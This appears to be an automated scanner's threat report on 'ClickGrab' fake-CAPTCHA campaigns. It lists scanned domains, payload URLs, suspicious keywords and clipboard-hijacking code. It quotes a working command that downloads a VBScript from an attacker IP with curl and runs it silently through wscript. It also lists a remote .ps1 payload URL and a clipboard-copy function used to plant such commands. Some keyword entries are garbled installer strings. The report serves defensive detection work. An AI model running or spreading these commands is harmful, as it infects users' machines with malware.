← Back to Analysis

Emerging ClickGrab Campaign: Advanced Analysis of 2026-09-14 Attack Patterns

100Sites
13%Detection
3PS Downloads

ClickGrab Threat Analysis Report - 2026-09-14

Generated on 2026-09-14 05:40:32

Executive Summary

  • Total sites analyzed: 100
  • Sites with malicious content: 13
  • Unique domains encountered: 192
  • Total URLs extracted: 5,297
  • PowerShell download attempts: 3
  • Clipboard manipulation instances: 53

Domain Analysis

Most Frequently Encountered Domains

  • d33egg70nrp50s.cloudfront.net: 696 occurrences
  • baovechuyennghiep.baovengayvadem.com: 696 occurrences
  • www.maheshwaree.com: 316 occurrences
  • 98.70.13.131: 304 occurrences
  • fudgeshop.com.au: 266 occurrences
  • picsera.com: 226 occurrences
  • 18.176.47.246: 216 occurrences
  • scillarodriguez.com: 200 occurrences
  • www.ccera-icar.org: 178 occurrences
  • senevie.com: 165 occurrences
  • www.creatorssky.com: 154 occurrences
  • www.evodigital.com.au: 140 occurrences
  • picsera.sirv.com: 125 occurrences
  • www.dorper.com.au: 125 occurrences
  • capazmente.com: 123 occurrences

URL Pattern Analysis

reCAPTCHA imagery

17 occurrences across 13 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (3 times)
  • https://www.google.com/recaptcha/api.js (2 times)
  • https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg (2 times)
  • http://172.96.189.153/wp-content/plugins/cf-security-shield/assets/css/captcha-styles.css?ver=1.0.0 (1 times)
  • http://172.96.189.153/wp-content/plugins/ckk/assets/css/captcha-styles.css?ver=2.0.0 (1 times)
  • ...and 8 more distinct URLs

Font resources

87 occurrences across 74 distinct URLs

  • https://fonts.gstatic.com (6 times)
  • https://fonts.googleapis.com (5 times)
  • https://use.fontawesome.com/releases/v5.0.0/css/all.css (3 times)
  • https://18.176.47.246/wp-content/themes/lightning/vendor/vektor-inc/font-awesome-versions/src/versions/6/css/all.min.css?ver=6.6.0 (2 times)
  • http://18.176.47.246/wp-content/themes/lightning/vendor/vektor-inc/font-awesome-versions/src/versions/6/css/all.min.css?ver=6.6.0 (2 times)
  • ...and 69 more distinct URLs

CDN hosted scripts

9 occurrences across 9 distinct URLs

  • https://cdn.tailwindcss.com (1 times)
  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)
  • https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css?ver=7.0.4 (1 times)
  • https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js?ver=6.0.8 (1 times)
  • https://diffuser-cdn.app-us1.com/diffuser/diffuser.js, (1 times)
  • ...and 4 more distinct URLs

Google resources

65 occurrences across 42 distinct URLs

  • https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (6 times)
  • https://fonts.googleapis.com (5 times)
  • https://www.googletagmanager.com/gtm.js?id= (4 times)
  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (3 times)
  • https://www.google (3 times)
  • ...and 37 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 439 (112 unique)

Keyword Categories

Social Engineering

67 unique keywords

  • CaptchaListeners
  • captcha-styles-css
  • exec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
  • captcha-badge
  • Command line: [2]Removing applicationsRemoving filesRemoving foldersFile: [1], Section: [2], Key: [3], Value: [4]Removing INI file entriesRemoving ODBC componentsRemoving system registry valuesKey: [1], Name: [2]Removing shortcutsFile: [1], Folder: [2]Registering modulesRemoving backup filesRollbackRemoving moved filesRollbackCleanupInitializing ODBC directoriesStarting servicesStopping servicesUnpublishing Qualified ComponentsUnpublishing product informationThe wizard was interrupted before [ProductName] could be completely installed.UnmoveFilesUnpublishing product featuresUnregister class serversCreating IIS Virtual Roots...UnpublishProductAppId: [1]{{, AppType: [2]}}Unregistering COM+ Applications and ComponentsUnregistering extension serversUnregistering fontsUnregistering MIME infoUnregistering program identifiersUnregistering type librariesWriting INI file valuesKey: [1], Name: [2], Value: [3]Writing system registry valuesAdvertising applicationRemoving IIS Virtual Roots...caCreateVRoots{&TahomaBold10}Welcome to the InstallShield Wizard for [ProductName]caRemoveVRoots1ISCHECKFORPRODUCTUPDATESAllUsersApplicationUsersNoAgreeToLicenseChange_IsMaintenanceCloseRestartRestartManagerOptionTypicalSetupType_IsSetupTypeMinDisplay_IsBitmapDlg{3B59CBE2-36D2-452F-B123-685CEEEB7456}[1]ALLUSERSARPPRODUCTICON.exeARPPRODUCTICON30DWUSINTERVALCE8B87EF8EFC67DF99ACF778AEBB978FDEEB808FFEAB07BFCEBC872FEE9BD088CECCA08FC9ACDWUSLINKTahoma8DefaultUIFontInstallShield for Windows InstallerDialogCaptionMinimalDisplayNameCustomThe InstallShield(R) Wizard will create a server image of [ProductName] at a specified network location. To continue, click Next.DisplayNameMinimalCosting COM+ application: [1]DisplayNameTypicalSetupErrorErrorDialog100INSTALLLEVEL0ISVROOT_PORT_NOInstalling COM+ application: [1]IS_COMPLUS_PROGRESSTEXT_COSTUninstalling COM+ application: [1]IS_COMPLUS_PROGRESSTEXT_INSTALLA newer version of this application is already installed on this computer. If you wish to install this version, please uninstall the newer version first. Click OK to exit the wizard.IS_COMPLUS_PROGRESSTEXT_UNINSTALLReplacing %s with %s in %s...IS_PREVENT_DOWNGRADE_EXITCosting XML files...IS_PROGMSG_TEXTFILECHANGS_REPLACECreating XML file %s...IS_PROGMSG_XML_COSTINGPerforming XML file changes...IS_PROGMSG_XML_CREATE_FILERemoving XML file %s...IS_PROGMSG_XML_FILESRolling back XML file changes...IS_PROGMSG_XML_REMOVE_FILEUpdating XML file %s...IS_PROGMSG_XML_ROLLBACK_FILESYour Company NameIS_PROGMSG_XML_UPDATE_FILEIS_SQLSERVER_AUTHENTICATIONsaIS_SQLSERVER_USERNAMEARInstallChoiceCreating application pool %sManufacturer12345<###-%%%%%%%>@@@@@PIDTemplateCreating application Pools...PROGMSG_IIS_CREATEAPPPOOLCreating IIS virtual directory %sPROGMSG_IIS_CREATEAPPPOOLSCreating IIS virtual directories...PROGMSG_IIS_CREATEVROOTCreating web service extensionPROGMSG_IIS_CREATEVROOTSCreating web service extensions...PROGMSG_IIS_CREATEWEBSERVICEEXTENSIONCreating IIS website %sPROGMSG_IIS_CREATEWEBSERVICEEXTENSIONSCreating IIS websites...PROGMSG_IIS_CREATEWEBSITEExtracting information for IIS virtual directories...PROGMSG_IIS_CREATEWEBSITESExtracted information for IIS virtual directories...PROGMSG_IIS_EXTRACTRemoving application po !"$0/& 2  &,!  2 & 
  • CaptchaImages
  • Verify you are human
  • captcha-logo
  • CAPTCHA
  • captcha_word_new_401037
  • ...and 57 more

Obfuscation Indicators

5 unique keywords

  • eval("clearTimeout(timeOut"+uid+")")
  • eval("clearTimeout(timeIn"+uid+")")
  • eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")
  • eval('var timeOut'+popupItems[i].id)
  • eval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")

System Commands

20 unique keywords

  • invoke
  • Invoke
  • wscript
  • command over Creativity, Excellence in spoken word, and outward articulation of inner knowledge.</p>
  • `exec(ua) != null) { rv = parseFloat(RegExp.$1); } } else if (n.appName == "Netscape") { rv = 11; re = new RegExp("Trident/.rv:([0-9]+[.0-9])"); if (re.exec(ua) != null) { rv = parseFloat(RegExp.$1); } } }

return rv; }

})(window, document, navigator)-command safe so later code runs /-CMD-Invoke-WebRequest-powershell-POWerShEll` - ...and 10 more*

Verification Text

3 unique keywords

  • Hidden
  • ray id
  • hidden

Technical Terms

17 unique keywords

  • Ray ID
  • odyssey
  • bitmap
  • iex
  • VirtualAlloc
  • .bat
  • AMOS
  • iEx
  • .ps1
  • WebClient
  • ...and 7 more

Most Frequent Keywords

  • hidden: 45 occurrences
  • robot: 37 occurrences
  • Robot: 24 occurrences
  • failed_to_retrieve: 22 occurrences
  • captcha: 17 occurrences
  • verification: 16 occurrences
  • CAPTCHA: 14 occurrences
  • CAPTCHA Verification: 10 occurrences
  • I am not a robot: 10 occurrences
  • You will observe: 10 occurrences
  • Verification: 10 occurrences
  • verification-id: 10 occurrences
  • To better prove you are not a robot: 10 occurrences
  • Verification ID: 8 occurrences
  • Ray ID: 7 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';, command = 'cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

Group 2: CAPTCHA Verification, CAPTCHA-verificatie-ID, Verification, verification, captcha-verified, verifications

Group 3: Verification ID, verification-id, verification id, VerificationToken, Verification Hash, verification_id

Group 4: Ray ID, ray id

Group 5: CAPTCHA, Captcha, CaptchaImages, captcha-modal, captcha, captcha_page, captcha-badge, captcha-logo, CAPTCHA-logo, captcha-box, captcha_word, captcha_sid, captcha-ui, captchaCanvas, captchaInput, captcha-msg, captcha-js, captcha_0, captcha_link_, CaptchaError

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • CREATEAPPPOOLSCreating
  • UnpublishProductAppId
  • IsMaintenanceCloseRestartRestartManagerOptionTypic...
  • identifiersUnregistering
  • DisplayNameMinimalCosting

Clipboard Manipulation Analysis

Detected clipboard manipulation in 53 instances.

Document.Execcommand Copy

Found in 24 snippets (45.3% of clipboard code)

Examples:

try { document.execCommand('copy')
document.execCommand('copy')
document.execCommand("copy")

Textarea Manipulation

Found in 24 snippets (45.3% of clipboard code)

Examples:

ng is the safe placeholder above const textarea = document.createElement('textarea'
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
tListener("click", function () { const textarea = document.createElement('textarea'

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Report truncated for storage. Full per-site detail is available in the scan JSON under nightly_reports/.